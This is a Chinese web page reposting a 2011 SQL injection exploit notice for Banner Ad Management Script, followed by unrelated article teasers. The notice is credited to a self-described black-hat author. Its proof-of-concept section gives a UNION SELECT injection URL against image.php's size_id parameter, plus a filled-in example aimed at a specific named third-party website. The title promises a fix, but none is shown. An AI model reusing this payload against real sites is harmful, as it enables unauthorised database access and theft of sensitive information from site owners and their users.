Banner Ad Management Script SQL注入漏洞及修複

 
Banner Ad Management Script 是一款網站橫幅廣告管理系統,Banner Ad Management Script存在SQL注入漏洞,可能導致敏感信息泄露。

[+]info:
~~~~~~~~~
[~] Exploit Title : Banner Ad Management Script [ Sql Injection Vulnerability]
[~] Author : Egyptian.H4x0rz
[~] Contact : SpY(at)Hotmail.Com
[~] Date : 02-04-2011
[~] Software Link: http://www.softbizscripts.com/banner-ads-management-script-features.php
[~] category: Web Apps [SQli]
[~] HomePage : Black-hat.cc

[+]poc:
~~~~~~~~~
*SQL injection Vulnerability*
[#] http://patch/image.php?size_id=-1+union+select+1,[sqli],3,4,5,6,7,8,9,10,11
[#] eXample
http://bbs.honkwin.com//ad-manager/image.php?size_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11

 

Tags:
更多相关文章
猜你喜欢
  • 這篇文章主要介紹了ExtJS4如何給Combobox設置列表中的默認值,需要的朋友可以參考下 這個是model Ext.regModel('commemModel', { fields : [ 'na ...
  • Wordpress之多備份插件使用方法
    Wordpress之多備份插件使用方法
    這篇文章主要介紹了Wordpress之多備份插件使用方法,需要的朋友可以參考下 插件名稱:多備份 插件下載:http://www.dbfen.com/tools/dbfen_wordpress_201 ...
  • 2.下載2.6內核源碼 下載地址:http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.18.tar.bz2 3.下載內核升級工具 (1)下載mo ...
  • 純幹貨:新三板的秘密(下)
    純幹貨:新三板的秘密(下)
    文/林莺 創新工場寫在前面的話:上一堂課我們主要講了公司在挂牌前的准備工作,以及新三板挂牌的作用及意義.本文是<新三板的秘密>下篇,我們將爲大家講解挂牌後公司需要准備的流程.公司VIE結構 ...
  • 利用無線接入點作爲中繼器擴展網絡覆蓋範圍由于曾經多次遇到過這一問題,並且非常具有代表意義(還將節省大量費用);因此,我決定在這裏將解決方案發布出來.情況是這樣的:如果出現需要使用無線網絡,但所處範圍又 ...